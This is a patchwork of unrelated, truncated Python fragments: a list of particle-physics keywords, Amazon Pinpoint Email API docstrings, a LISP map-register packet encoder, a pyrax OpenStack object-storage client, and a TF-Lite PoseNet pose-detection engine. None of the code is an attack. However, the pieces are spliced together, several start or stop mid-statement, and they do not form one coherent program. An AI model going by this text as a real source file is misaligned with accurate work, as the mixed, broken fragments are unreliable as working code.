u"spectrometer",
u"algebra: fusion",
u"RICH",
u"neutrino: supernova",
u"magnetization",
u"effective field theory: chiral",
u"polarized beam",
u"charmed meson: pair production",
u"supersymmetry: split",
u"time reversal",
u"pi: decay",
u"interaction: model",
u"baryon: oscillation: acoustic",
u"gluon: distribution function",
u"Fermi liquid",
u"symmetry breaking: U(1)",
u"asymmetry: time dependence",
u"cosmic radiation: interaction",
u"renormalization group: fixed point",
u"correlation function: two-particle",
u"supersymmetry: 8",
u"heavy ion",
u"phase space: Hilbert space",
u"top: branching ratio",
u"electromagnetic field: external field",
u"Z0: width",
u"kappa symmetry",
u"nucleus: structure function",
u"tension",
u"radio wave",
u"sum rule: light cone",
u"low-energy theorem",
u"flavor: mixing",
u"B-L number",
u"metal",
u"membrane",
u"gauge field theory: SU(3) x SU(3) x U(1)",
u"density: spectral",
u"model: lattice",
u"photon: off-shell",
u"conference summary",
u"boundary condition: twist",
u"Weyl",
u"shadowing",
u"gamma ray: background",
u"cascade",
u"interaction",
u"charge: fluctuation",
u"long-range",
u"group: Lorentz",
u"anti-p: cosmic radiation",
u"pi pi: scattering amplitude",
u"quark: fragmentation",
u"unitarity: violation",
u"coupling: conformal",
u"duality: quark hadron",
u"massive",
u"sparticle: electroproduction",
u"lepton: transverse momentum",
u"metric",
u"B: decay constant",
u"current: electromagnetic",
u"quantum mechanics: relativistic",
u"random phase approximation",
u"meson: exotic",
u"gluino",
u"invariance: reparametrization",
u"algebra: affine",
u"cosmic radiation: secondary",
u"tetrad",
u"B/s: branching ratio",
u"gluon: saturation",
u"synchrotron",
u"supergravity: 2",
u"showers",
u"eta: hadroproduction",
u"spinor: Dirac",
u"holonomy: G(2)",
u"transformation: modular",
u"D-term",
u"quantum mechanics: supersymmetry",
u"metric: perturbation",
u"beam optics",
u"scalar particle",
u"polarization: tensor",
u"pseudoscalar meson: decay constant",
u"baryon: multiplet",
u"Lambda: hadroproduction",
u"mixing: kinetic",
u"model: solar",
u"showers: spatial distribution",
u"dark matter: production",
u"operator: Becchi-Rouet-Stora",
u"gap equation",
u"photon: mass",
u"electron positron: inclusive reaction",
u"gauge boson: coupling",
u"channel cross section: correction",
u"quark: radiative decay",
u"vector boson: fusion",
u"parton: density",
u"sparticle",
u"X(3872)",
u"higher-twist",
u"momentum transfer: low",
u"parton: multiple scattering",
u"Daya Bay",
u"dark energy: interaction",
u"mass: pole",
u"nuclear reactor",
u"gluon: Regge",
u"black ring",
u"mass: bottom",
u"pi: condensation",
u"operator: dimension: 6",
u"pi: multiple production",
u"J/psi(3100): photoproduction",
u"gravitational radiation detector: interferometer",
u"meson: decay",
u"group: representation",
u"quantum electrodynamics: scalar",
u"pseudoscalar",
u"potential model",
u"model: hadronization",
u"time-of-flight",
u"background: anti-de Sitter",
u"representation: nonlinear",
u"Type IIB",
u"space-time: horizon",
u"tau: leptonic decay",
u"anthropic principle",
u"Cartan",
u"Lambda: polarization",
u"form factor: ratio",
u"electron positron: elastic scattering",
u"Sivers function",
u"organic compounds",
u"master integral",
u"vacuum: stability",
u"Darmstadt SIS",
u"energy: phantom",
u"electron: mass",
u"duality: string",
u"quarkonium: hadroproduction",
u"curvaton",
u"anti-B0: hadronic decay",
u"high energy behavior",
u"impulse approximation",
u"D: semileptonic decay",
u"hadron: yield",
u"VHE",
u"scintillation counter: plastics",
u"cross section: longitudinal",
u"gluino: pair production",
u"rapidity: density",
u"algebraic geometry",
u"peripheral",
u"space-time: anisotropy",
u"K+: semileptonic decay",
u"oscillation: acoustic",
u"Z0: mass",
u"Lambda(1405)",
u"quarkonium",
u"eta: photoproduction",
u"space: fuzzy",
u"magnetic field: effect",
u"quark: massless",
u"f0(600): mass",
u"hadron: model",
u"partial wave analysis: multipole",
u"ALEPH",
u"B/s: leptonic decay",
u"longitudinal",
u"U-duality",
u"meson: width",
u"nuclear physics: effect",
u"measure",
u"quarkonium: width",
u"squark: pair production",
u"positron: energy spectrum",
u"p: pair production",
u"photon: resolved",
u"correlation: long-range",
u"xenon",
u"F-term",
u"symmetry: transformation",
u"kinematics: phase space",
u"equivalence principle: violation",
u"gravitational radiation: spectrum",
u"mass spectrum: missing-mass",
u"backscatter: laser",
u"measurement theory",
u"gravitino: LSP",
u"diffraction: dissociation",
u"Lifshitz",
u"interference: effect",
u"Hartree-Fock approximation",
u"Kaehler",
u"luminosity: high",
u"anti-p",
u"coalescence",
u"hydrodynamics: viscosity",
u"graviton: propagator",
u"phase space: Fock space",
u"particle: interaction",
u"hardware",
u"showers: electromagnetic",
u"lithium",
u"spin: parity",
u"lepton number",
u"cross section: transverse",
u"horizon: geometry",
u"quark: density",
u"dijet",
u"scaling: geometrical",
u"symmetry breaking: conformal",
u"D: hadronic decay",
u"Klein-Gordon equation: solution",
u"fluid: viscosity",
u"Hall effect: fractional",
u"isospin: asymmetry",
u"particle: model",
u"nucleon nucleon: potential",
u"transverse momentum: dependence",
u"chargino: mass",
u"photon photon: fusion",
u"cylinder",
u"transformation: canonical",
u"form factor: scalar",
u"linear collider",
u"gravitation: tensor",
u"Fourier transformation",
u"channel cross section: upper limit",
u"cross section: hadronic",
u"mass formula",
u"Higgs particle: heavy",
u"electroweak interaction: precision measurement",
u"Dyson-Schwinger equation: solution",
u"baryon resonance",
u"gaugino: condensation",
u"structure function: moment",
u"p-brane: 7",
u"particle: Dirac",
u"direct detection",
u"showers: parton",
u"quantum electrodynamics: correction",
u"string: compactification",
u"T-parity",
u"supersymmetry: parameter space",
u"capture",
u"parton: scattering",
u"messenger",
u"topological insulator",
u"scattering amplitude: forward scattering",
u"matter: accretion",
u"fermion: mass generation",
u"bottom: particle identification",
u"collinear",
u"flavor: SU(3)",
u"sparticle: decay modes",
u"correction",
u"D: pair production",
u"Upsilon(9460)",
u"up",
u"decay constant",
u"gauge boson: hadroproduction",
u"quark: star",
u"black hole: primordial",
u"perturbation: adiabatic",
u"affine",
u"potential: flat direction",
u"quark: mass: twist",
u"B/s0: branching ratio",
u"cumulant | |
object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.
- **SigningEnabled** *(boolean) --*
If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.
- **Status** *(string) --*
Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:
* ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them.
* ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity.
* ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them.
* ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain.
* ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DNS records for the domain.
- **Tokens** *(list) --*
A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.
- *(string) --*
- **MailFromAttributes** *(dict) --*
An object that contains information about the Mail-From attributes for the email identity.
- **MailFromDomain** *(string) --*
The name of a domain that an email identity uses as a custom MAIL FROM domain.
- **MailFromDomainStatus** *(string) --*
The status of the MAIL FROM domain. This status can have the following values:
* ``PENDING`` – Amazon Pinpoint hasn't started searching for the MX record yet.
* ``SUCCESS`` – Amazon Pinpoint detected the required MX record for the MAIL FROM domain.
* ``FAILED`` – Amazon Pinpoint can't find the required MX record, or the record no longer exists.
* ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the status of the MAIL FROM domain.
- **BehaviorOnMxFailure** *(string) --*
The action that Amazon Pinpoint takes if it can't read the required MX record for a custom MAIL FROM domain. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn't attempt to deliver the email.
These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.
:type EmailIdentity: string
:param EmailIdentity: **[REQUIRED]**
The email identity that you want to retrieve details for.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_configuration_sets(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
List all of the configuration sets associated with your Amazon Pinpoint account in the current region.
In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/ListConfigurationSets>`_
**Request Syntax**
::
response = client.list_configuration_sets(
NextToken='string',
PageSize=123
)
**Response Syntax**
::
{
'ConfigurationSets': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
A list of configuration sets in your Amazon Pinpoint account in the current AWS Region.
- **ConfigurationSets** *(list) --*
An array that contains all of the configuration sets in your Amazon Pinpoint account in the current AWS Region.
- *(string) --*
The name of a configuration set.
In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.
- **NextToken** *(string) --*
A token that indicates that there are additional configuration sets to list. To view additional configuration sets, issue another request to ``ListConfigurationSets`` , and pass this token in the ``NextToken`` parameter.
:type NextToken: string
:param NextToken:
A token returned from a previous call to ``ListConfigurationSets`` to indicate the position in the list of configuration sets.
:type PageSize: integer
:param PageSize:
The number of results to show in a single call to ``ListConfigurationSets`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.
:rtype: dict
:returns:
"""
pass
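# A minimal pagination sketch (the 'client' variable is hypothetical),
# following the NextToken/PageSize semantics documented above:
#   names = []
#   kwargs = {'PageSize': 10}
#   while True:
#       page = client.list_configuration_sets(**kwargs)
#       names.extend(page.get('ConfigurationSets', []))
#       if not page.get('NextToken'):
#           break
#       kwargs['NextToken'] = page['NextToken']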
def list_dedicated_ip_pools(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
List all of the dedicated IP pools that exist in your Amazon Pinpoint account in the current AWS Region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/ListDedicatedIpPools>`_
**Request Syntax**
::
response = client.list_dedicated_ip_pools(
NextToken='string',
PageSize=123
)
**Response Syntax**
::
{
'DedicatedIpPools': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
A list of dedicated IP pools.
- **DedicatedIpPools** *(list) --*
A list of all of the dedicated IP pools that are associated with your Amazon Pinpoint account.
- *(string) --*
The name of a dedicated IP pool.
- **NextToken** *(string) --*
A token that indicates that there are additional IP pools to list. To view additional IP pools, issue another request to ``ListDedicatedIpPools`` , passing this token in the ``NextToken`` parameter.
:type NextToken: string
:param NextToken:
A token returned from a previous call to ``ListDedicatedIpPools`` to indicate the position in the list of dedicated IP pools.
:type PageSize: integer
:param PageSize:
The number of results to show in a single call to ``ListDedicatedIpPools`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.
:rtype: dict
:returns:
"""
pass
def list_deliverability_test_reports(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
Show a list of the predictive inbox placement tests that you've performed, regardless of their statuses. For predictive inbox placement tests that are complete,
class lisp_map_register():
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        xtr_id = lisp_hex_string(self.xtr_id)
        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")
        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id,
            " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) else
            (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else ""),
            self.auth_len, xtr_id, self.site_id))

    def encode(self):
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))
        packet = self.zero_auth(packet)
        return (packet)

    def zero_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_size = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_size = struct.calcsize("QQI")
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_size = struct.calcsize("QQQQ")
        packet = packet[0:offset] + auth_data + packet[offset + auth_size::]
        return (packet)
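    # A minimal usage sketch (names from this module; the LISP_* constants
    # are defined elsewhere in the file): build and serialize a Map-Register.
    #   mr = lisp_map_register()
    #   mr.map_notify_requested = True
    #   mr.alg_id = LISP_SHA_256_128_ALG_ID
    #   packet = mr.encode()            # flags word + nonce/key-id/alg-id/auth-len,
    #                                   # with the auth field zeroed by zero_auth()
    #   packet = mr.encode_auth(packet) # presumably overwrites the zeroed auth
    #                                   # field with the computed digest (truncated below)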
    def encode_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
is not None:
etag = utils.get_checksum(content)
if etag:
headers["ETag"] = etag
if not headers.get("Content-Type"):
headers["Content-Type"] = None
uri = "/%s/%s" % (self.uri_base, obj_name)
resp, resp_body = self.api.method_put(uri, data=content,
headers=headers)
@_handle_object_not_found
def fetch(self, obj, include_meta=False, chunk_size=None, size=None,
extra_info=None):
"""
Fetches the object from storage.
If 'include_meta' is False, only the bytes representing the
stored object are returned.
Note: if 'chunk_size' is defined, the 'include_meta' parameter is
ignored.
If 'size' is specified, only the first 'size' bytes of the object will
be returned. If the object is smaller than 'size', the entire object is
returned.
When 'include_meta' is True, what is returned from this method is a
2-tuple:
Element 0: a dictionary containing metadata about the file.
Element 1: a stream of bytes representing the object's contents.
The 'extra_info' parameter is included for backwards compatibility. It
is no longer used at all, and will not be modified with swiftclient
info, since swiftclient is not used any more.
"""
uri = "/%s/%s" % (self.uri_base, utils.get_name(obj))
if chunk_size:
# Need the total size of the object
if not isinstance(obj, StorageObject):
obj = self.get(obj)
obj_size = obj.total_bytes
return self._fetch_chunker(uri, chunk_size, size, obj_size)
headers = {}
if size:
headers = {"Range": "bytes=0-%s" % size}
resp, resp_body = self.api.method_get(uri, headers=headers,
raw_content=True)
if include_meta:
meta_resp, meta_body = self.api.method_head(uri)
return (meta_resp.headers, resp_body)
return resp_body
def _fetch_chunker(self, uri, chunk_size, size, obj_size):
"""
Returns a generator that returns an object in chunks.
"""
pos = 0
total_bytes = 0
size = size or obj_size
max_size = min(size, obj_size)
while True:
endpos = min(obj_size, pos + chunk_size - 1)
headers = {"Range": "bytes=%s-%s" % (pos, endpos)}
resp, resp_body = self.api.method_get(uri, headers=headers,
raw_content=True)
pos = endpos + 1
if not resp_body:
# End of file
return
yield resp_body
total_bytes += len(resp_body)
if total_bytes >= max_size:
return
def fetch_partial(self, obj, size):
"""
Returns the first 'size' bytes of an object. If the object is smaller
than the specified 'size' value, the entire object is returned.
"""
return self.fetch(obj, size=size)
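# Usage sketch (hypothetical names): stream a large object to disk in 64 KiB
# chunks rather than holding the whole payload in memory.
#   with open("backup.tar", "wb") as out:
#       for chunk in mgr.fetch("backup.tar", chunk_size=65536):
#           out.write(chunk)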
@_handle_object_not_found
def delete(self, obj):
"""
Deletes the object if it exists; raises NoSuchObject exception if it
does not exist.
"""
return super(StorageObjectManager, self).delete(obj)
def delete_all_objects(self, nms, asynchronous=False):
"""
Deletes all objects from this container.
By default the call will block until all objects have been deleted. By
passing True for the 'asynchronous' parameter, this method will not block, and
instead return an object that can be used to follow the progress of the
deletion. When deletion is complete the bulk deletion object's
'results' attribute will be populated with the information returned
from the API call. In synchronous mode this is the value that is
returned when the call completes. It is a dictionary with the following
keys:
deleted - the number of objects deleted
not_found - the number of objects not found
status - the HTTP return status code. '200 OK' indicates success
errors - a list of any errors returned by the bulk delete call
"""
if nms is None:
nms = self.api.list_object_names(self.name, full_listing=True)
return self.api.bulk_delete(self.name, nms, asynchronous=asynchronous)
@_handle_object_not_found
def download(self, obj, directory, structure=True):
"""
Fetches the object from storage, and writes it to the specified
directory. The directory must exist before calling this method.
If the object name represents a nested folder structure, such as
"foo/bar/baz.txt", that folder structure will be created in the target
directory by default. If you do not want the nested folders to be
created, pass `structure=False` in the parameters.
"""
if not os.path.isdir(directory):
raise exc.FolderNotFound("The directory '%s' does not exist." %
directory)
obj_name = utils.get_name(obj)
path, fname = os.path.split(obj_name)
if structure:
fullpath = os.path.join(directory, path)
if not os.path.exists(fullpath):
os.makedirs(fullpath)
target = os.path.join(fullpath, fname)
else:
target = os.path.join(directory, fname)
with open(target, "wb") as dl:
content = self.fetch(obj)
try:
dl.write(content)
except UnicodeEncodeError:
encoding = pyrax.get_encoding()
dl.write(content.encode(encoding))
@_handle_object_not_found
def purge(self, obj, email_addresses=None):
"""
Removes a CDN-enabled object from public access before the TTL expires.
Please note that there is a limit (at this time) of 25 such requests;
if you need to purge more than that, you must contact support.
If one or more email_addresses are included, an email confirming the
purge is sent to each address.
"""
cname = utils.get_name(self.container)
oname = utils.get_name(obj)
headers = {}
if email_addresses:
email_addresses = utils.coerce_to_list(email_addresses)
headers["X-Purge-Email"] = ", ".join(email_addresses)
uri = "/%s/%s" % (cname, oname)
resp, resp_body = self.api.cdn_request(uri, method="DELETE",
headers=headers)
@_handle_object_not_found
def get_metadata(self, obj, prefix=None):
"""
Returns the metadata for the specified object as a dict.
"""
uri = "/%s/%s" % (self.uri_base, utils.get_name(obj))
resp, resp_body = self.api.method_head(uri)
ret = {}
# Add the metadata prefix, if needed.
if prefix is None:
prefix = OBJECT_META_PREFIX
low_prefix = prefix.lower()
for hkey, hval in list(resp.headers.items()):
lowkey = hkey.lower()
if lowkey.startswith(low_prefix):
cleaned = hkey.replace(low_prefix, "").replace("-", "_")
ret[cleaned] = hval
return ret
@_handle_object_not_found
def set_metadata(self, obj, metadata, clear=False, prefix=None):
"""
Accepts a dictionary of metadata key/value pairs and updates the
specified object metadata with them.
If 'clear' is True, any existing metadata is deleted and only the
passed metadata is retained. Otherwise, the values passed here update
the object's metadata.
By default, the standard object metadata prefix ('X-Object-Meta-') is
prepended to the header name if it isn't present. For non-standard
headers, you must include a non-None prefix, such as an empty string.
"""
# Add the metadata prefix, if needed.
if prefix is None:
prefix = OBJECT_META_PREFIX
massaged = _massage_metakeys(metadata, prefix)
cname = utils.get_name(self.container)
oname = utils.get_name(obj)
new_meta = {}
# Note that the API for object POST is the opposite of that for
# container POST: for objects, all current metadata is deleted,
# whereas for containers you need to set the values to an empty
# string to delete them.
if not clear:
obj_meta = self.get_metadata(obj, prefix=prefix)
new_meta = _massage_metakeys(obj_meta, prefix)
utils.case_insensitive_update(new_meta, massaged)
# Remove any empty values, since the object metadata API will
# store them.
to_pop = []
for key, val in six.iteritems(new_meta):
if not val:
to_pop.append(key)
for key in to_pop:
new_meta.pop(key)
uri = "/%s/%s" % (cname, oname)
resp, resp_body = self.api.method_post(uri, headers=new_meta)
@_handle_object_not_found
def remove_metadata_key(self, obj, key):
"""
Removes the specified key from the object's metadata. If the key does
not exist in the metadata, nothing is done.
"""
meta_dict = {key: ""}
return self.set_metadata(obj, meta_dict)
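# Usage sketch (hypothetical names): the default 'X-Object-Meta-' prefix is
# prepended for you, so plain keys can be set and later removed directly.
#   mgr.set_metadata(obj, {"owner": "data-team"})
#   mgr.remove_metadata_key(obj, "owner")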
class StorageClient(BaseClient):
"""
This is the primary class for interacting with OpenStack Object Storage.
"""
name = "Object Storage"
# Folder upload status dict. Each upload will generate its own UUID key.
# The app can use that key to query the status of the upload. This dict
# will also be used to hold the flag to interrupt uploads in progress.
folder_upload_status = {}
# Interval in seconds between checks for completion of bulk deletes.
bulk_delete_interval = 1
def __init__(self, *args, **kwargs):
# Constants used in metadata headers
super(StorageClient, self).__init__(*args, **kwargs)
self._sync_summary = {"total": 0,
"uploaded": 0,
"ignored": 0,
"older": 0,
"duplicate": 0,
"failed": 0,
"failure_reasons": [],
"deleted": 0,
}
self._cached_temp_url_key = None
self.cdn_management_url = ""
self.method_dict = {
"HEAD": self.method_head,
"GET": self.method_get,
"POST": self.method_post,
"PUT": self.method_put,
"DELETE": self.method_delete,
"PATCH": self.method_patch,
}
# Configure CDN, if available
self._configure_cdn()
# Alias old method names to new versions for backwards compatibility.
self._backwards_aliases()
def _configure_cdn(self):
"""
Initialize CDN-related endpoints, if available.
"""
ident = self.identity
cdn_svc = ident.services.get("object_cdn")
if cdn_svc:
ep = cdn_svc.endpoints.get(self.region_name)
if ep:
self.cdn_management_url = ep.public_url
def _backwards_aliases(self):
"""
In order to keep this backwards-compatible with previous versions,
alias the old names to the new methods.
"""
self.list_containers = self.list_container_names
self.get_all_containers = self.list
self.get_container = self.get
self.create_container = self.create
self.delete_container = self.delete
self.get_container_objects = self.list_container_objects
self.get_container_object_names = self.list_container_object_names
self.get_info = self.get_account_info
def get(self, item):
"""
Returns the container whose name is provided as 'item'. If 'item' is
not a string, the original item is returned unchanged.
"""
if isinstance(item, six.string_types):
item = super(StorageClient, self).get(item)
return item
def _configure_manager(self):
"""
Creates a manager to handle interacting with Containers.
"""
self._manager
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tflite_runtime.interpreter import Interpreter
import time
KEYPOINTS = (
'nose',
'left eye',
'right eye',
'left ear',
'right ear',
'left shoulder',
'right shoulder',
'left elbow',
'right elbow',
'left wrist',
'right wrist',
'left hip',
'right hip',
'left knee',
'right knee',
'left ankle',
'right ankle'
)
KEYPOINTS_DICT = dict(zip(KEYPOINTS, range(len(KEYPOINTS))))
poseChain = (
('nose', 'left eye'),
('left eye', 'left ear'),
('nose', 'right eye'),
('right eye', 'right ear'),
('nose', 'left shoulder'),
('left shoulder', 'left elbow'),
('left elbow', 'left wrist'),
('left shoulder', 'left hip'),
('left hip', 'left knee'),
('left knee', 'left ankle'),
('nose', 'right shoulder'),
('right shoulder', 'right elbow'),
('right elbow', 'right wrist'),
('right shoulder', 'right hip'),
('right hip', 'right knee'),
('right knee', 'right ankle')
)
parentToChildEdges = [KEYPOINTS_DICT[poseChain[i][1]] for i in range(len(poseChain))]
childToParentEdges = [KEYPOINTS_DICT[poseChain[i][0]] for i in range(len(poseChain))]
class Keypoint:
__slots__ = ['k', 'yx', 'score']
def __init__(self, k, yx, score=None):
self.k = k
self.yx = yx
self.score = score
def __repr__(self):
return 'Keypoint(<{}>, {}, {})'.format(self.k, self.yx, self.score)
class Pose:
__slots__ = ['keypoints', 'score']
def __init__(self, keypoints, score=None):
assert len(keypoints) == len(KEYPOINTS)
self.keypoints = keypoints
self.score = score
def __repr__(self):
return 'Pose({}, {})'.format(self.keypoints, self.score)
class PoseEngine:
"""Engine used for pose tasks."""
def __init__(self, model_path, mirror=False,
offsetRefineStep = 2, scoreThreshold = 0.8,
maxPoseDetections = 5, nmsRadius = 30, minPoseConfidence=0.15):
"""Creates a PoseEngine with given model.
Args:
model_path: String, path to TF-Lite Flatbuffer file.
mirror: Flip keypoints horizontally
Raises:
ValueError: An error occurred when model output is invalid.
"""
self.interpreter = Interpreter(model_path)
self.interpreter.allocate_tensors()
self._mirror = mirror
self._input_tensor_shape = self.get_input_tensor_shape()
if (self._input_tensor_shape.size != 4 or
self._input_tensor_shape[3] != 3 or
self._input_tensor_shape[0] != 1):
raise ValueError(
('Image model should have input shape [1, height, width, 3]!'
' This model has {}.'.format(self._input_tensor_shape)))
_, self.image_height, self.image_width, self.image_depth = self.get_input_tensor_shape()
self.heatmaps_nx = self.interpreter.get_output_details()[0]['shape'][2]
self.heatmaps_ny = self.interpreter.get_output_details()[0]['shape'][1]
self.heatmaps_stride_x = self.getStride(self.image_width, self.heatmaps_nx)
self.heatmaps_stride_y = self.getStride(self.image_height, self.heatmaps_ny)
self.quant_heatmaps_r, self.quant_heatmaps_off = self.interpreter.get_output_details()[0]['quantization']
self.quant_offsets_short_r, self.quant_offsets_short_off = self.interpreter.get_output_details()[1]['quantization']
self.quant_offsets_mid_r, self.quant_offsets_mid_off = self.interpreter.get_output_details()[2]['quantization']
self.offsetRefineStep = offsetRefineStep
self.scoreThreshold = scoreThreshold
self.maxPoseDetections = maxPoseDetections
self.nmsRadius = nmsRadius
self.sqRadius = self.nmsRadius*self.nmsRadius
self.minPoseConfidence = minPoseConfidence
# The API returns all the output tensors flattened and concatenated. We
# have to figure out the boundaries from the tensor shapes & sizes.
offset = 0
self._output_offsets = [0]
for size in self.get_all_output_tensors_sizes():
offset += size
self._output_offsets.append(offset)
def getStride(self, l, n):
strides = (8, 16, 32)
return strides[np.argmin(np.abs(strides - l/n))]
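    # Example (illustrative geometry, not read from a specific model): a
    # 353x481 MobileNet PoseNet input with a 23x31 heatmap grid gives
    # l/n = 353/23 ~= 15.3 for the rows, so the nearest of (8, 16, 32) is 16.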
def get_input_tensor_shape(self):
return self.interpreter.get_input_details()[0]['shape']
def get_all_output_tensors_sizes(self):
sizes = np.array([], dtype='int32')
for d in self.interpreter.get_output_details():
s = np.squeeze(self.interpreter.get_tensor(d['index'])).flatten().size
sizes = np.append(sizes, int(s))
return sizes
def DetectPosesInImage(self, img):
"""Detects poses in a given image.
For ideal results make sure the image fed to this function is close to the
expected input size - it is the caller's responsibility to resize the
image accordingly.
Args:
img: numpy array containing image
"""
# Extend or crop the input to match the input shape of the network.
if img.shape[0] < self.image_height or img.shape[1] < self.image_width:
img = np.pad(img, [[0, max(0, self.image_height - img.shape[0])],
[0, max(0, self.image_width - img.shape[1])], [0, 0]],
mode='constant')
img = img[0:self.image_height, 0:self.image_width]
assert (img.shape == tuple(self._input_tensor_shape[1:]))
# Run the inference (API expects the data to be flattened)
return self.ParseOutput(self.run_inference(img))
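    # Usage sketch (the model path is hypothetical): decode poses from an RGB
    # frame already resized close to the network input size.
    #   engine = PoseEngine('posenet_mobilenet_v1_quant.tflite')
    #   poses = engine.DetectPosesInImage(frame)   # frame: HxWx3 numpy array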
def run_inference(self, img):
if img.shape[0] < self.image_height or img.shape[1] < self.image_width:
img = np.pad(img, [[0, max(0, self.image_height - img.shape[0])],
[0, max(0, self.image_width - img.shape[1])], [0, 0]],
mode='constant')
img = img[0:self.image_height, 0:self.image_width]
assert (img.shape == tuple(self._input_tensor_shape[1:]))
tensor_index = self.interpreter.get_input_details()[0]['index']
